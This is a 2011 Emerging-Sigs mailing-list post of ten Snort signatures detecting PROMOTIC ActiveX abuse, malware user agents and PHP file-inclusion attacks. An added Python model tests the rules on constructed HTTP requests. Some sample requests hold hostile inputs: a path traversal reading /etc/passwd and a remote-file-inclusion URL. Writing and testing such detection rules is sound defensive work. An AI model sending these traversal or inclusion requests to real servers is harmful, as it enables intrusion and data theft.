[Emerging-Sigs] StillSecure: 10 New Signatures - October 21st, 2011

signatures signatures at stillsecure.com
Fri Oct 21 08:34:27 EDT 2011


Hi Matt,

Please find the 10 signatures below.

1. WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (SaveCfg)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (SaveCfg)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"02000002-9DFA-4B37-ABE9-1929F4BCDEA2"; nocase; distance:0; content:".SaveCfg"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*02000002-9DFA-4B37-ABE9-1929F4BCDEA2/si"; classtype:attempted-user; reference:url,aluigi.altervista.org/adv/promotic_1-adv.txt; sid:1710111; rev:1;)

2. WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (AddTrend)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PROMOTIC ActiveX Control Insecure method (AddTrend)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"02000002-9DFA-4B37-ABE9-1929F4BCDEA2"; nocase; distance:0; content:".AddTrend"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*02000002-9DFA-4B37-ABE9-1929F4BCDEA2/si"; classtype:attempted-user; reference:url,aluigi.altervista.org/adv/promotic_1-adv.txt; sid:1710112; rev:1;)

3. VIRUS Suspicious user agent string (FULLSTUFF)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"VIRUS Suspicious user agent string (FULLSTUFF)"; flow: established,to_server; content:"|0d 0a|User-Agent|3A| FULLSTUFF"; nocase; depth:300; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=mrb.mail.ru; sid:2011480; rev:1;)

4. VIRUS Suspicious user agent contains string (MSIE 6.0)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"VIRUS Suspicious user agent contains string (MSIE 6.0)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Mozilla/4.0 (compatible|3b| MSIE 6.0|3b|"; classtype:trojan-activity; sid:1810113; rev:1;)

5. USER_AGENT Suspicious user agent string (NateFinder)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (NateFinder)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| NateFinder"; classtype:trojan-activity; sid:1810111; rev:1;)

6. USER_AGENT Suspicious user agent string (Install Stub)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (Install Stub)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| Install Stub"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=stats.norton.com; sid:1910111; rev:1;)

7. USER_AGENT Suspicious user agent string (webfile)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (webfile)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| webfile"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=upsh.playmusic.co.kr; sid:1910112; rev:1;)

8. USER_AGENT Suspicious user agent string (DARecover)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"USER_AGENT Suspicious user agent string (DARecover)"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| DARecover"; classtype:trojan-activity; reference:url,threatexpert.com/reports.aspx?find=clients.mydealassistant.com; sid:2010111; rev:1;)

9. WEB-PHP 1024 CMS filename Parameter Local File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP 1024 CMS filename Parameter Local File Inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/modules/forcedownload/force_download.php?"; nocase; uricontent:"filename="; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,exploit-db.com/exploits/18000; sid:2010112; rev:1;)

10. WEB-PHP Wordpress disclosure policy plugin Remote File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Wordpress disclosure policy plugin Remote File Inclusion Attempt"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/wp-content/plugins/disclosure-policy-plugin/functions/action.php?"; nocase; pcre:"/abspath=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,exploit-db.com/exploits/17865; sid:1021111; rev:1;)

Looking forward to your comments, if any.

Thanks & Regards,
StillSecure
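Added example, not part of the original post and not code from StillSecure or Emerging Threats: a plain-Python model of the content, uricontent and pcre matching that the rules above rely on, run over constructed HTTP messages. The sids, patterns and modifiers are copied from the rules; the host names, paths and page scripts in the samples are made up. The model honours only the modifiers those rules use (nocase, distance, depth, the U pcre buffer) and is meant for reasoning about what a rule does and does not match, not as a replacement for Snort's own engine.

```python
import re

# Plain-Python model of the Snort content / uricontent / pcre matching the rules
# above rely on, run over constructed HTTP messages. Added example, not code from
# StillSecure or Emerging Threats, and not a replacement for Snort's own engine.

def C(pat, nocase=False, distance=None, depth=None):
    """One content: pattern bytes plus the modifiers the rules above use."""
    return {"pat": pat, "nocase": nocase, "distance": distance, "depth": depth}

def promotic_rule(sid, method):
    """The two PROMOTIC rules differ only in sid and the method name they require."""
    guid = b"02000002-9DFA-4B37-ABE9-1929F4BCDEA2"
    return {"sid": sid, "flow": "to_client",
            "contents": [C(b"<OBJECT ", True), C(b"classid", True, 0), C(b"CLSID", True, 0),
                         C(guid, True, 0), C(b"." + method, True)],
            "pcre": (rb"<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*" + guid,
                     re.S | re.I, "payload")}

RULES = [
    promotic_rule(1710111, b"SaveCfg"),
    promotic_rule(1710112, b"AddTrend"),
    {"sid": 2011480, "flow": "to_server",  # FULLSTUFF user agent
     "contents": [C(b"\r\nUser-Agent: FULLSTUFF", True, depth=300)]},
    {"sid": 1810113, "flow": "to_server",  # MSIE 6.0 user agent
     "contents": [C(b"\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;")]},
    {"sid": 2010112, "flow": "to_server",  # 1024 CMS filename LFI
     "contents": [C(b"GET ", depth=4), C(b"\x2e\x2e\x2f", True, depth=200)],
     "uricontents": [(b"/modules/forcedownload/force_download.php?", True), (b"filename=", False)]},
    {"sid": 1021111, "flow": "to_server",  # WordPress disclosure-policy abspath RFI
     "contents": [C(b"GET ", depth=4)],
     "uricontents": [(b"/wp-content/plugins/disclosure-policy-plugin/functions/action.php?", True)],
     "pcre": (rb"abspath=\s*(ftps?|https?|php)\:\/", re.I, "uri")},
]

def _find(hay, pat, nocase):
    return hay.lower().find(pat.lower()) if nocase else hay.find(pat)

def match_contents(payload, contents):
    """Walk a content chain: 'distance' starts the search at the end of the previous
    match, 'depth' bounds how far into the search window the pattern may lie."""
    prev_end = 0
    for c in contents:
        start = prev_end + c["distance"] if c["distance"] is not None else 0
        window = payload[start:] if c["depth"] is None else payload[start:start + c["depth"]]
        i = _find(window, c["pat"], c["nocase"])
        if i < 0:
            return False
        prev_end = start + i + len(c["pat"])
    return True

def request_uri(payload):
    """Request-URI from the request line (Snort's 'U' buffer); b'' for a response."""
    parts = payload.split(b"\r\n", 1)[0].split(b" ")
    return parts[1] if len(parts) == 3 and not parts[0].startswith(b"HTTP/") else b""

def matching_sids(payload):
    """Return the sids of every modelled rule that fires on one HTTP message."""
    flow = "to_client" if payload.startswith(b"HTTP/") else "to_server"
    uri, hits = request_uri(payload), []
    for r in RULES:
        if r["flow"] != flow or not match_contents(payload, r["contents"]):
            continue
        if any(_find(uri, p, nc) < 0 for p, nc in r.get("uricontents", [])):
            continue
        if "pcre" in r:
            pat, flags, buf = r["pcre"]
            if not re.search(pat, uri if buf == "uri" else payload, flags):
                continue
        hits.append(r["sid"])
    return hits

def promotic_page(script):
    """Constructed HTML response that instantiates the PROMOTIC control."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>\n"
            b'<OBJECT id="pm" classid="clsid:{02000002-9DFA-4B37-ABE9-1929F4BCDEA2}"></OBJECT>\n'
            b"<script>" + script + b"</script></body></html>")

# Constructed traffic (hosts, paths and scripts are made up, not real captures).
SAMPLES = {
    "promotic_savecfg": promotic_page(b'pm.SaveCfg("x.cfg");'),
    "promotic_addtrend": promotic_page(b'pm.AddTrend("t");'),
    "promotic_object_only": promotic_page(b"/* control loaded, no method called */"),
    "fullstuff_ua": b"GET /c.php HTTP/1.1\r\nHost: example.net\r\nUser-Agent: FULLSTUFF\r\n\r\n",
    "ie6_browser": (b"GET /index.html HTTP/1.1\r\nHost: example.net\r\n"
                    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n"),
    "cms_lfi": (b"GET /modules/forcedownload/force_download.php?filename=../../../../etc/passwd HTTP/1.1\r\n"
                b"Host: example.net\r\nUser-Agent: curl/7.21.0\r\n\r\n"),
    "wp_rfi": (b"GET /wp-content/plugins/disclosure-policy-plugin/functions/action.php?abspath=http://example.org/x.txt? HTTP/1.1\r\n"
               b"Host: example.net\r\n\r\n"),
    "clean_page": b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>hello</body></html>",
}

if __name__ == "__main__":
    for name, msg in SAMPLES.items():
        print(f"{name:22s} -> {matching_sids(msg)}")
```

Running it prints each sample with the sids that fire. Two things worth noticing: the PROMOTIC rules need both the CLSID chain and the method name, so a page that only instantiates the control stays silent; and the MSIE 6.0 rule (sid 1810113) fires on the ordinary IE6 browser request just as it does on malware traffic, since its content string is nothing more than a standard IE6 user agent prefix, so it needs thresholding or suppression anywhere real IE6 clients still exist.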
